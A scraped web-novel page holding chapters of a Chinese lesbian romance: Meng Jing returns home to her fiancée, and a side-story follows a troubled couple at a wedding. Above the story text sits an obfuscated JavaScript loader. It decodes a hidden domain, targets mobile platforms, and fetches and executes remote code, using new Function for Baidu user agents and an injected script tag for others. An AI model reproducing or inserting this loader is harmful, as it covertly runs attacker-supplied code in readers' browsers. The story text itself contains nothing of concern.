98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(89(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

孟璟和班上的同学们赏完枫叶,下山来分道扬镳之际,有同学临时提议去唱歌,拉着孟璟说:平时你不大合群,这还是头一次和我们近距离互动,可得待久一点。若若也在外地吧?别急着走啊。

孟璟那句我要早点回家在说出口之前蓦地刹住了车,她看一眼安静如鸡的手机,哼了一声,抬起头来对大家笑了笑:好啊,我请客,下午场到午夜场。

同学齐齐欢呼一声。

唱歌的时候孟璟还是盯着手机,把自己搞得很累。

到了九点整的时候,终于迎来了未婚妻的第一条消息。

[ssr:什么时候回来?]

包厢里许多人亲眼所见,孟璟从红沙发上径直蹦起来,脸上有个灿烂的笑,一改往常的高冷。没人知道她发生了什么好事,但大家都有种当场给她拜年的冲动。有人猜测是宋若突然从外地回来了。

孟璟整理了一下表情,咳了两咳,理了理衣领,讪讪说道:那什么,家里还有只小猫没喂,我先回去了。

真看不出来,你还养猫啊。

对啊,大家接下来玩儿得尽兴哈。

孟璟买完单就回家了,没开车出来,打了个车,一个劲儿地催师傅开快一点。

到家十点多一点,未婚妻躺在客厅的沙发上睡着了,身上裹了个小毯子,屋子里没开暖气,她大概是冷得很,缩成小小的一团。小脸倒冻得发红。

孟璟蹲下来,有点心疼,早上还说老婆过分,自己其实也很过分呀,怎么能为了那么微不足道的原因,就把老婆晾一天。她连毯子带人一起抱起来,只可惜药瓶子是在等她,心里挂着事,所以睡得很警醒,尽管她动作很轻,若若还是瞬间就醒了,咕哝道:你回来啦。

我回来了。孟璟亲亲她的脸,干脆不急着送她回房间了,抱着她在沙发上坐下,让她坐在自己腿上,小药瓶头发睡乱了,裹一床小毯子,造型别有趣味。因此目光闪闪地打量着。

若若也不去管她眼睛里有几分调侃,从毯子底下递出手机来,把里边的几张图片给她看,让助理帮忙选的,发给盛雪看了,她说这两件可以,你说哪一件好?

小药瓶很认真地望着她。

你是不是有什么忘了问啊?孟璟替她绾绾发丝。

宋若眼波像水似的,咬唇笑了笑,问:枫叶漂亮吗?

孟璟点点头,摩挲她的发,真的像在侍弄一只小猫咪。

那你觉得哪件好?若若又把手机递上来。

孟璟说:薄荷绿的好。

宋若于是就捣鼓手机,把薄荷绿的发给盛雪。

孟璟看她的小爪子在屏幕上戳啊戳,眼睫毛扑闪扑闪,咳嗽一声:没有别的要问了吗?

宋若抬起头来,起先有点茫然,过了会儿,眉头一动,好像对什么事情恍然大悟,缓缓地用手环住了她的脖子,抵着她的额头悄悄问:那你有什么要汇报的?

孟璟忍不住笑起来。是冒出来很多小桃花没错。这个属性貌似改不了了。不过现在确实也没必要说了。她忽然间理解了未婚妻。若若身处娱乐圈,身边每天环绕的同行都个顶个的厉害,一个赛一个的美丽,那五光十色的诱惑,她不放在眼里,那么她自然相信,她的大鲸鱼也可以和别人保持距离。这既是未婚妻的自信,也是对她的信任。

她蹭蹭她鼻尖,有啊,报告太太,你的鲸鱼饿了。

裹在毯子里的人就做出一副企图越狱的样子。

干嘛去?她抱得更紧。

去拿鲸鱼饲料。

孟璟又被她逗笑,咬着耳朵说:不用。已经有安排了。

她抱着太太回了房间。

第106章 qm番外.

陆漫漫请了一星期假。

她已很久没休过假了。

秦萌是个工作狂,她如果单方面一闲下来,就很容易反反复复地想她,而想她是没有结果的,这人就整个儿的由内到外都是冷飕飕的,冰冷的理性派,把她当同仁和她谈工作,她能逻辑清晰地给你分析出个一二三来,而且孜孜不倦头头是道,你和她谈感情,她立马就做出一副这什么鬼的厌恶表情。

但是每当她对着实验室里新开发出来的小机器人,眼睛里分明是有狂热的。她是那些机器人的妈,这很讽刺,然而这也说明,她并非没有感情的机器人。

陆漫漫想着,自己只有比她更忙碌,才不会被这种相处方式所伤。她在办公室收拾东西时,同事很好奇,毕竟她是个连年假都不休的人。问及原因,她据实以告:秦的世交家的小孩结婚。我陪她去观礼。

秦萌的父亲和孟姗姗是故交,孟的女儿办婚礼,请了秦萌的父亲出席,然而他的身体状况不允许,所以只有秦萌代父出征了。本来她觉得千里迢迢去参加婚宴是一种精力上的浪费,但据她所知,这次的新人和宋若还有孟璟那一对关系匪浅,后两者还是伴娘。

秦萌对宋若还是贼心不死的样子。但凡是若若出演的电影,在美上映的她就第一时间去影院看,否则就去网上观摩,本来是极简主义,可以不要的东西她一律都摒弃了,书房里却贴了六幅宋若的装饰画,她是完全把她当成奥黛丽赫本来崇拜了。这次又要见到真人,鬼知道她会整什么幺蛾子。

她不得不防着一点。

整个登机过程,这禽兽都笑眯眯地看着她,看得她心里直发毛。但她也懒怠追究这笑容的深层次意义,戴上眼罩睡大觉。

盛雪和谢琼的婚礼是在印度洋一个热门岛屿上举行,很大手笔,现场美丽而奢华。每位来客都安排在昂贵的酒店公寓式套间。

陆漫漫也不知道自己是因为什么悄悄崩溃的。

也许是目睹一对新人举手投足间的默契。

也许是秦萌第一百次对宋若露出星星眼和迷之脸红。

也许是不经意间撞破的一个小细节婚礼头天下午,碧空如洗,阳光充沛,万里无云,她在酒店附近闲逛,才走了没两步,就看到了宋若和孟璟。

有人在那里弹琴歌唱,大家拾阶而坐,当那即兴演奏的观众。她俩坐在一堆本地人中间,闪闪发光,精致得不似人间所有。

她被两人之间那种暗暗浮动着的粉色泡泡所吸引,懵然找了个稍显隐蔽的角落坐下,正在宋孟二人的斜后方,她们的两只手在避人耳目的地方十指交缠,孟璟说了一句什么,仿佛是索吻,微微嘟了嘟嘴,宋若微笑着红了脸,只是不理她,但是过了一会儿,又侧过脸去亲孟璟的脸,然而孟璟只是假装不知道,在女朋友亲过来的时候,猛地侧过身来,带着点戏谑用嘴唇接住了这个吻,亲完又补了一个吻,眼睛里还是促狭的笑意,隐约有摄像机的咔嚓声,她们也并不在意,只是若若显然害羞了,从她坐的角度看去,她连耳朵根儿都红了。

这才是恋爱!

她以前只是觉得,正常的妻妻不该是她和秦萌那样的,虽然说她追到萌萌,算是求仁得仁,梦想成真,可结了婚以后,追到也仿佛没追到,如果没有对比,那么不会产生伤害,一旦有了完美的参照物,她就觉得自己不行了,自欺不下去。

证婚人宣布一对新人正式结为妻妻,婚宴结束,新人就出发前往阿鲁巴度蜜月去了。

当晚她约了秦萌在海边见面,再次提出离婚。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间